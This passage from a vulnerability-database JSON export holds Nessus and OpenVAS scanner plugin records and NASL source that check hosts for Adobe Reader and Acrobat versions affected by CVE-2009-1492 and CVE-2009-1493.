script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-8.1.5-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:43", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 3 Extras, Red Hat Enterprise\nLinux 4 Extras, and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader\nto crash or, potentially, execute arbitrary code as the user running\nAdobe Reader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 8.1.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "modified": "2019-01-02T00:00:00", "published": "2009-08-24T00:00:00", "id": "REDHAT-RHSA-2009-0478.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40744", "title": "RHEL 3 / 4 / 5 : acroread (RHSA-2009:0478)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0478. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40744);\n script_version (\"1.27\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_bugtraq_id(34736, 34740);\n script_xref(name:\"RHSA\", value:\"2009:0478\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : acroread (RHSA-2009:0478)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 3 Extras, Red Hat Enterprise\nLinux 4 Extras, and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader\nto crash or, potentially, execute arbitrary code as the user running\nAdobe Reader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 8.1.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1493\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb09-06.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb09-06.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0478\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0478\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-8.1.5-2\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-8.1.5-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-8.1.5-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-8.1.5-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:51", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-21T00:00:00", "published": "2009-09-24T00:00:00", "id": "SUSE_11_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41363", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 899)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41363);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 899)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 899.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-8.1.5-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:17", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.", "modified": "2018-11-15T00:00:00", "published": "2009-05-13T00:00:00", "id": "ADOBE_READER_911.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38746", "title": "Adobe Reader getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38746);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_xref(name:\"CERT\", value:\"970180\");\n script_xref(name:\"Secunia\", value:\"34924\");\n\n script_name(english:\"Adobe Reader getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The PDF file viewer on the remote Windows host is affected by a memory\ncorruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa09-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.1.1 / 8.1.5 / 7.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Acroread/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\ninfo = NULL;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB item is missing.');\n\nforeach ver (vers)\n{\n if (\n ver && \n (\n ver =~ \"^[0-6]\\.\" ||\n ver =~ \"^7\\.(0\\.|1\\.[01]($|[^0-9]))\" ||\n ver =~ \"^8\\.(0\\.|1\\.[0-4]($|[^0-9]))\" ||\n ver =~ \"^9\\.(0\\.|1\\.0($|[^0-9]))\"\n )\n )\n {\n path = get_kb_item('SMB/Acroread/'+ver+'/Path');\n if (isnull(path)) exit(1, 'The \"SMB/Acroread/'+ver+'/Path\" KB item is missing.');\n\n verui = get_kb_item('SMB/Acroread/'+ver+'/Version_UI');\n if (isnull(verui)) exit(1, 'The \"SMB/Acroread/'+ver+'/Version_UI\" KB item is missing.');\n\n info += ' - ' + verui + ', under ' + path + '\\n';\n }\n}\n\nif (isnull(info)) exit(0, 'The remote host is not affected.');\n\nif (report_verbosity > 0)\n{\n if (max_index(split(info)) > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n}\nelse security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:44", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.", "modified": "2018-11-15T00:00:00", "published": "2009-08-28T00:00:00", "id": "ADOBE_ACROBAT_911.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40804", "title": "Adobe Acrobat < 9.1.1 / 8.1.5 / 7.1.2 getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40804);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2009-1492\");\n script_bugtraq_id(34736);\n script_xref(name:\"CERT\", value:\"970180\");\n script_xref(name:\"Secunia\", value:\"34924\");\n\n script_name(english:\"Adobe Acrobat < 9.1.1 / 8.1.5 / 7.1.2 getAnnots() JavaScript Method PDF Handling Memory Corruption (APSB09-06)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\na memory corruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1.1 / 8.1.5 / 7.1.2. Such versions reportedly fail to validate\ninput from a specially crafted PDF file before passing it to the\nJavaScript method 'getAnnots()' leading to memory corruption and\npossibly arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa09-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-06.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.1.1 / 8.1.5 / 7.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:'vuln_publication_date', value:'2009/05/01');\n script_set_attribute(attribute:'patch_publication_date', value:'2009/05/12');\n script_set_attribute(attribute:'plugin_publication_date', value:'2009/08/28');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"SMB/Acrobat/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\n\nif (\n version =~ \"^[0-6]\\.\" ||\n version =~ \"^7\\.(0\\.|1\\.[01]($|[^0-9]))\" ||\n version =~ \"^8\\.(0\\.|1\\.[0-4]($|[^0-9]))\" ||\n version =~ \"^9\\.(0\\.|1\\.0($|[^0-9]))\"\n)\n{\n version_ui = get_kb_item(\"SMB/Acrobat/Version_UI\");\n if (report_verbosity > 0 && version_ui)\n {\n path = get_kb_item(\"SMB/Acrobat/Path\");\n if (isnull(path)) path = \"n/a\";\n\n report = string(\n \"\\n\",\n \" Path : \", path, \"\\n\",\n \" Installed version : \", version_ui, \"\\n\",\n \" Fix : 9.1.1 / 8.1.5 / 7.1.2\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"Acrobat \"+version+\" is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:13:47", "bulletinFamily": "scanner", "description": "Check for the Version of Adobe Acrobat Reader", "modified": "2017-02-20T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855744", "id": "OPENVAS:855744", "title": "Solaris Update for Adobe Acrobat Reader 121104-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Adobe Acrobat Reader 121104-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Adobe Acrobat Reader on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Adobe Acrobat Reader\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855744);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"121104-10\");\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n script_name(\"Solaris Update for Adobe Acrobat Reader 121104-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-121104-10-1\");\n\n script_summary(\"Check for the Version of Adobe Acrobat Reader\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121104-10\", package:\"SUNWacroread\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-04T13:43:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to Denial of Service\n vulnerability.", "modified": "2018-12-03T00:00:00", "published": "2009-05-11T00:00:00", "id": "OPENVAS:1361412562310800701", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800701", "title": "Adobe Reader Denial of Service Vulnerability (May09)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_dos_vuln_may09_lin.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Adobe Reader Denial of Service Vulnerability (May09)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800701\");\n script_version(\"$Revision: 12629 $\");\n script_cve_id(\"CVE-2009-1493\", \"CVE-2009-1492\");\n script_bugtraq_id(34740, 34736);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-11 08:41:11 +0200 (Mon, 11 May 2009)\");\n script_name(\"Adobe Reader Denial of Service Vulnerability (May09)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to Denial of Service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"These flaws are due to a memory corruption errors in 'customDictionaryOpen'\n and 'getAnnots' methods in the JavaScript API while processing malicious PDF\n files with a long string in the second argument.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause memory corruption or\n denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.1 and prior on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Adobe Reader version 9.3.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34924\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/50146\");\n script_xref(name:\"URL\", value:\"http://packetstorm.linuxsecurity.com/0904-exploits/spell.txt\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nreaderVer = ereg_replace(pattern:\"\\_\", replace:\".\", 